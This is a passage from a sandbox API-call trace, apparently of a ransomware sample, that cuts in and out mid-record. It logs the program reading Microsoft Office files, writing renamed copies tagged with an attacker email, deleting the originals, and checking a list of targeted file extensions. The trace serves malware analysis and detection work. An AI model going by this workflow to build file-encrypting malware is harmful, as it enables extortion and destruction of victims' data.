dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.743] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0271.745] GetLastError () returned 0x0 [0271.745] ReadFile (in: hFile=0x388, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x4c450, lpOverlapped=0x0) returned 1 [0271.753] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x4c460, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x4c460, lpOverlapped=0x0) returned 1 [0271.758] ReadFile (in: hFile=0x388, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.758] WriteFile (in: hFile=0x3b0, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.758] SetEndOfFile (hFile=0x3b0) returned 1 [0271.758] CloseHandle (hObject=0x3b0) returned 1 [0271.758] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.758] SetEndOfFile (hFile=0x388) returned 1 [0271.911] CloseHandle (hObject=0x388) returned 1 [0271.911] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.923] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\cagcat10.mml")) returned 1 [0271.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.924] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.924] lstrlenW (lpString=".doc") returned 4 [0271.924] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0271.924] lstrlenW (lpString=".docx") returned 5 [0271.924] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0271.924] lstrlenW (lpString=".pdf") returned 4 [0271.924] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0271.924] lstrlenW (lpString=".xls") returned 4 [0271.924] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0271.924] lstrlenW (lpString=".xlsx") returned 5 [0271.924] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0271.924] lstrlenW (lpString=".ppt") returned 4 [0271.925] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString=".zip") returned 4 [0271.925] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0271.925] lstrlenW (lpString=".rar") returned 4 [0271.925] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0271.925] lstrlenW (lpString=".bz2") returned 4 [0271.925] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0271.925] lstrlenW (lpString=".7z") returned 3 [0271.925] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString=".dbf") returned 4 [0271.925] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString=".1cd") returned 4 [0271.925] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString=".jpg") returned 4 [0271.925] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.925] lstrlenW (lpString=".doc") returned 4 [0271.925] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0271.925] lstrlenW (lpString=".docx") returned 5 [0271.925] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0271.925] lstrlenW (lpString=".pdf") returned 4 [0271.925] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0271.925] lstrlenW (lpString=".xls") returned 4 [0271.925] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0271.926] lstrlenW (lpString=".xlsx") returned 5 [0271.926] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0271.926] lstrlenW (lpString=".ppt") returned 4 [0271.926] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0271.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.926] lstrlenW (lpString=".zip") returned 4 [0271.926] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0271.926] lstrlenW (lpString=".rar") returned 4 [0271.926] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0271.926] lstrlenW (lpString=".bz2") returned 4 [0271.926] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0271.926] lstrlenW (lpString=".7z") returned 3 [0271.926] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0271.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.926] lstrlenW (lpString=".dbf") returned 4 [0271.926] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0271.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.926] lstrlenW (lpString=".1cd") returned 4 [0271.926] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0271.926] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\CAGCAT10.MML") returned 66 [0271.926] lstrlenW (lpString=".jpg") returned 4 [0271.926] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0271.926] lstrcmpiW (lpString1=".MML", lpString2=".USA") returned -1 [0271.926] lstrlenW (lpString="OFFICE10.MML") returned 12 [0271.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.927] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=312376) returned 1 [0271.927] CloseHandle (hObject=0x394) returned 1 [0271.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 0x20 [0271.927] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.927] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.927] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0271.975] GetLastError () returned 0x0 [0271.975] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x4c438, lpOverlapped=0x0) returned 1 [0271.981] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x4c440, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x4c440, lpOverlapped=0x0) returned 1 [0271.987] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.987] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.987] SetEndOfFile (hFile=0x3b4) returned 1 [0271.987] CloseHandle (hObject=0x3b4) returned 1 [0271.987] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.987] SetEndOfFile (hFile=0x394) returned 1 [0271.994] CloseHandle (hObject=0x394) returned 1 [0271.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML" (normalized: "c:\\program files\\microsoft office\\media\\office14\\1033\\office10.mml")) returned 1 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.994] lstrlenW (lpString=".doc") returned 4 [0271.994] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0271.994] lstrlenW (lpString=".docx") returned 5 [0271.994] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0271.994] lstrlenW (lpString=".pdf") returned 4 [0271.994] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0271.994] lstrlenW (lpString=".xls") returned 4 [0271.994] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0271.994] lstrlenW (lpString=".xlsx") returned 5 [0271.994] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0271.994] lstrlenW (lpString=".ppt") returned 4 [0271.994] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0271.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.994] lstrlenW (lpString=".zip") returned 4 [0271.995] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0271.995] lstrlenW (lpString=".rar") returned 4 [0271.995] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0271.995] lstrlenW (lpString=".bz2") returned 4 [0271.995] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0271.995] lstrlenW (lpString=".7z") returned 3 [0271.995] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0271.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.995] lstrlenW (lpString=".dbf") returned 4 [0271.995] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0271.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.995] lstrlenW (lpString=".1cd") returned 4 [0271.995] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0271.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.995] lstrlenW (lpString=".jpg") returned 4 [0271.995] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0271.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.995] lstrlenW (lpString=".doc") returned 4 [0271.995] lstrcmpiW (lpString1=".doc", lpString2=".MML") returned -1 [0271.995] lstrlenW (lpString=".docx") returned 5 [0271.995] lstrcmpiW (lpString1=".docx", lpString2="0.MML") returned -1 [0271.995] lstrlenW (lpString=".pdf") returned 4 [0271.995] lstrcmpiW (lpString1=".pdf", lpString2=".MML") returned 1 [0271.995] lstrlenW (lpString=".xls") returned 4 [0271.995] lstrcmpiW (lpString1=".xls", lpString2=".MML") returned 1 [0271.995] lstrlenW (lpString=".xlsx") returned 5 [0271.995] lstrcmpiW (lpString1=".xlsx", lpString2="0.MML") returned -1 [0271.995] lstrlenW (lpString=".ppt") returned 4 [0271.996] lstrcmpiW (lpString1=".ppt", lpString2=".MML") returned 1 [0271.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.996] lstrlenW (lpString=".zip") returned 4 [0271.996] lstrcmpiW (lpString1=".zip", lpString2=".MML") returned 1 [0271.996] lstrlenW (lpString=".rar") returned 4 [0271.996] lstrcmpiW (lpString1=".rar", lpString2=".MML") returned 1 [0271.996] lstrlenW (lpString=".bz2") returned 4 [0271.996] lstrcmpiW (lpString1=".bz2", lpString2=".MML") returned -1 [0271.996] lstrlenW (lpString=".7z") returned 3 [0271.996] lstrcmpiW (lpString1=".7z", lpString2="MML") returned -1 [0271.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.996] lstrlenW (lpString=".dbf") returned 4 [0271.996] lstrcmpiW (lpString1=".dbf", lpString2=".MML") returned -1 [0271.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.996] lstrlenW (lpString=".1cd") returned 4 [0271.996] lstrcmpiW (lpString1=".1cd", lpString2=".MML") returned -1 [0271.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\OFFICE10.MML") returned 66 [0271.996] lstrlenW (lpString=".jpg") returned 4 [0271.996] lstrcmpiW (lpString1=".jpg", lpString2=".MML") returned -1 [0271.996] lstrcmpiW (lpString1=".MMW", lpString2=".USA") returned -1 [0271.996] lstrlenW (lpString="OFFICE10.MMW") returned 12 [0271.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.998] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=492624) returned 1 [0271.998] CloseHandle (hObject=0x394) returned 1 [0271.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 0x20 [0272.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.003] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.003] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4 [0272.003] GetLastError () returned 0x0 [0272.003] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x78450, lpOverlapped=0x0) returned 1 [0272.017] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x78460, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x78460, lpOverlapped=0x0) returned 1 [0272.025] ReadFile (in: hFile=0x394, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.025] WriteFile (in: hFile=0x3b4, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.025] SetEndOfFile (hFile=0x3b4) returned 1 [0272.077] CloseHandle (hObject=0x3b4) returned 1 [0272.077] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.077] SetEndOfFile (hFile=0x394) returned 1 [0272.086] CloseHandle (hObject=0x394) returned 1 [0272.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.087] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 1 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.087] lstrlenW (lpString=".doc") returned 4 [0272.087] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0272.087] lstrlenW (lpString=".docx") returned 5 [0272.087] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0272.087] lstrlenW (lpString=".pdf") returned 4 [0272.087] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0272.087] lstrlenW (lpString=".xls") returned 4 [0272.087] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0272.087] lstrlenW (lpString=".xlsx") returned 5 [0272.087] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0272.087] lstrlenW (lpString=".ppt") returned 4 [0272.087] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0272.087] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.087] lstrlenW (lpString=".zip") returned 4 [0272.087] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0272.087] lstrlenW (lpString=".rar") returned 4 [0272.087] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0272.087] lstrlenW (lpString=".bz2") returned 4 [0272.087] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0272.087] lstrlenW (lpString=".7z") returned 3 [0272.087] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString=".dbf") returned 4 [0272.088] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString=".1cd") returned 4 [0272.088] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString=".jpg") returned 4 [0272.088] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString=".doc") returned 4 [0272.088] lstrcmpiW (lpString1=".doc", lpString2=".MMW") returned -1 [0272.088] lstrlenW (lpString=".docx") returned 5 [0272.088] lstrcmpiW (lpString1=".docx", lpString2="0.MMW") returned -1 [0272.088] lstrlenW (lpString=".pdf") returned 4 [0272.088] lstrcmpiW (lpString1=".pdf", lpString2=".MMW") returned 1 [0272.088] lstrlenW (lpString=".xls") returned 4 [0272.088] lstrcmpiW (lpString1=".xls", lpString2=".MMW") returned 1 [0272.088] lstrlenW (lpString=".xlsx") returned 5 [0272.088] lstrcmpiW (lpString1=".xlsx", lpString2="0.MMW") returned -1 [0272.088] lstrlenW (lpString=".ppt") returned 4 [0272.088] lstrcmpiW (lpString1=".ppt", lpString2=".MMW") returned 1 [0272.088] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.088] lstrlenW (lpString=".zip") returned 4 [0272.088] lstrcmpiW (lpString1=".zip", lpString2=".MMW") returned 1 [0272.088] lstrlenW (lpString=".rar") returned 4 [0272.088] lstrcmpiW (lpString1=".rar", lpString2=".MMW") returned 1 [0272.088] lstrlenW (lpString=".bz2") returned 4 [0272.088] lstrcmpiW (lpString1=".bz2", lpString2=".MMW") returned -1 [0272.088] lstrlenW (lpString=".7z") returned 3 [0272.089] lstrcmpiW (lpString1=".7z", lpString2="MMW") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.089] lstrlenW (lpString=".dbf") returned 4 [0272.089] lstrcmpiW (lpString1=".dbf", lpString2=".MMW") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.089] lstrlenW (lpString=".1cd") returned 4 [0272.089] lstrcmpiW (lpString1=".1cd", lpString2=".MMW") returned -1 [0272.089] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW") returned 61 [0272.089] lstrlenW (lpString=".jpg") returned 4 [0272.089] lstrcmpiW (lpString1=".jpg", lpString2=".MMW") returned -1 [0272.089] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.089] lstrlenW (lpString="ACCVDTUI.DLL") returned 12 [0272.089] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.141] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=158600) returned 1 [0272.142] CloseHandle (hObject=0x388) returned 1 [0272.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll")) returned 0x20 [0272.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\accvdtui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.166] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ACCVDTUI.DLL") returned 60 [0272.166] lstrlenW (lpString=".doc") returned 4 [0272.166] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString=".docx") returned 5 [0272.167] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1 [0272.167] lstrlenW (lpString=".pdf") returned 4 [0272.167] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString=".xls") returned 4 [0272.167] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.167] lstrlenW (lpString=".xlsx") returned 5 [0272.167] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1 [0272.167] 